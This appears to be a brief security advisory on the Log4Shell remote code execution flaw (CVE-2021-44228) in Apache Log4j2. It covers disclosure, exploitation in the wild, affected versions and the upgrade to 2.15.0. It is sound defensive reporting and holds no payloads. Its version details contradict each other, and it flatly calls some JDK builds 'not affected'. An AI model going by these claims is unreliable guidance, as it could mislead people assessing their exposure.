Log4Shell –CVE-2021-44228 –Apache Log4j Vulnerability

Priority: Critical

Executive Summary:

Tracked as CVE-2021-44228. A new remote code execution vulnerability in Apache Log4j2, a Java based logging tool enables threat actors to take full control of servers without authentication. Publicly disclosed on 9thDecember 2021, the vulnerability is believed to being actively exploited in the wild.

The flaw was dubbed “Log4Shell” by LunaSecwho informed the public, Versions 2.0 and 2.14.1 of Apache Log4j have been impacted. Java Development Kit versions 6u211, 7u201, 8u191 and 11.0.1 are not affected, read in blog in Source [1].

Detect:

The flaw was first discovered on sites that cater to users on the popular game, Minecraft, 48 hours ago. Sites reportedly warned that attackers could unleash malicious code on either servers or clients running the Java version of Minecraft by manipulating log messages, including from text typed into chat messages.

Threat actors globally has already tried to exploit the new bug, tweeted by: Cyber Emergency Response Team (CERT) of the Deutsche Telekom Group who continued to say they were seeing attacks on their honeypots coming from the Tor network.

Affected Products:

The vulnerability affects versions of Log4j before 2.14.1. Specifically, Versions 2.0 and 2.14.1 of Apache Log4j have been impacted.

Java Development Kit versions 6u211, 7u201, 8u191 and 11.0.1 are not affected.

Prevent:

Updating the log4j-core.jar to version 2.15.0, which was released Friday, fixes the problem. Specifically, to prevent the library being exploited, it’s urgently recommended that Log4j versions are upgraded to log4j-2.15.0-rc1.

React:
Security researchers are considering Log4Shell to be much like Shellshock with regards to the enormous attack surface it poses. John Hammond, Senior Security Researcher at Huntress, who created a PoC for Log4Shell, predicted that threat actors will likely include payloads in simple HTTP connections, either in a User-Agent header or trivial POST form data.

John Hammond informed Threatpost that “organisations are already seeing signs of exploitation in the wild, and adversaries will just spray-and-pray across the internet.” “This isn’t a targeted attack”, he noted, given that “there is no target.”

The Apache Foundation published a patch for the critical-rated vulnerability yesterday. Its patch notes confirmed: “An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.”

Sources

[1]: https://www.lunasec.io/docs/blog/log4j-zero-day/
[2]: https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/
[3]: https://www.theregister.com/2021/12/10/log4j_remote_code_execution_vuln_patch_issued/